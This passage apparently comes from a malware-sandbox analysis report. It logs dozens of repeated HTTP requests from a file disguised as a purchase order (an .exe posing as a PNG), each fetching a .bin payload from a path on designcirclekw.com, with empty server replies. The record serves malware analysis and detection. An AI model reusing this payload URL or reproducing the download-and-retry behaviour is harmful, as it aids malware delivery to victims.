                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:14 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:13 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.84999662.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:15 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:16 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:15 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.84999762.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:17 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:18 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:17 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.84999862.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:19 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:21 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:19 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.84999962.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:22 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:23 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:22 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.85000062.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:24 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:25 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:24 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.85000162.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:26 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:27 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:26 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.85000262.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:28 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:29 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:28 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.85000362.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:30 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:31 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:30 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.85000462.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:32 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:33 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:33 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.85000562.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:35 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:35 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:35 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.85000662.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:36 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:37 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:37 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.85000762.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:38 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:39 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:39 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.85000862.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:40 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:41 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:41 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.85000962.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:42 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:43 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:42 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.85001062.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:44 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:45 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:44 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.85001162.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:46 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:47 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:46 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.85001262.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:48 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:49 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:48 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.85001362.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:50 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:51 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:50 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.85001462.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:52 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:53 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:52 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.85001562.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:54 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:55 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:54 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.85001662.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:56 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:57 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:56 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    41192.168.2.85001762.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:38:58 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:38:59 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:38:58 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    42192.168.2.85001862.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:00 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:01 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:00 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    43192.168.2.85001962.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:02 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:03 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:02 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    44192.168.2.85002062.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:04 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:04 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:04 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    45192.168.2.85002162.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:06 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:06 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:06 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    46192.168.2.85002262.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:08 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:08 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:08 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    47192.168.2.85002362.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:09 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:10 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:10 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    48192.168.2.85002462.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:11 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:12 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:12 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    49192.168.2.85002562.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:13 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:14 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:14 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    50192.168.2.85002662.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:15 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:16 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:15 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    51192.168.2.85002762.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:17 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:19 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:17 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
